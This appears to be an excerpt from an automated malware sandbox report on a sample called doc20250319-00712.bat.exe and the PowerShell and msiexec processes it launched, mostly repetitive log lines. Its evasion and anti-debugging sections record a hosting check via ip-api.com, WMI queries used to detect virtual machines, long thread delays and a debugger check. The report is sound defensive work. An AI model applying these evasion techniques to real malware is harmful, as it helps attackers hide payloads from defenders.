Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\msiexec.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8210			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1259			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5948	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -24903104499507879s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep count: 1261 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -99890s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -99780s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180	Thread sleep count: 7227 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -99672s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -99562s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -99453s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -99344s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -99234s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -99125s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -99015s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -98906s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -98796s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -98687s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -98578s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -98468s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -98350s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -98234s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -98125s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -98015s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -97906s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -97796s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -97687s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -97578s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -97468s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -97359s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -97250s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -97140s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -97030s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -96922s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -96812s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -96703s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -96593s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -96484s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -96374s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -96265s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -96156s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -96046s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -95936s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -95828s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -95718s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -95609s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -95500s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8176	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Code function: 0_2_00405451 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405451
Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Code function: 0_2_00405E95 FindFirstFileA,FindClose,	0_2_00405E95
Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Code function: 0_2_00402645 FindFirstFileA,	0_2_00402645

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99780	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99672	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99562	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99453	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99344	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99234	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99125	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99015	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98906	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98796	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98687	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98578	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98468	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98350	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98234	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98125	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98015	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 97906	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 97796	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 97687	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 97578	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 97468	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 97359	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 97250	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 97140	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 97030	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 96922	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 96812	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 96703	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 96593	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 96484	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 96374	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 96265	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 96156	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 96046	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 95936	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 95828	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 95718	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 95609	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 95500	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: powershell.exe, 00000003.00000002.1767732385.0000000005571000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter@\\|q
Source: powershell.exe, 00000003.00000002.1767732385.0000000005571000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.1767732385.0000000005571000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter@\\|q
Source: powershell.exe, 00000003.00000002.1767732385.0000000005571000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: msiexec.exe, 0000000C.00000002.2407825000.00000000063BA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.1892606448.00000000063E5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2407825000.00000000063E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: msiexec.exe, 0000000C.00000003.1892606448.00000000063E5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2407825000.00000000063E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW~/
Source: powershell.exe, 00000003.00000002.1767732385.0000000005571000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter@\\|q
Source: powershell.exe, 00000003.00000002.1767732385.0000000005571000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter

Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	API call chain: ExitProcess graph end node			graph_0-2713
Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	API call chain: ExitProcess graph end node			graph_0-2875

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 12_2_027970E0 CheckRemoteDebuggerPresent,

12_2_027970E0

Source: C:\Windows\SysWOW64\msiexec.exe	Process queried: DebugPort			Jump to behavior
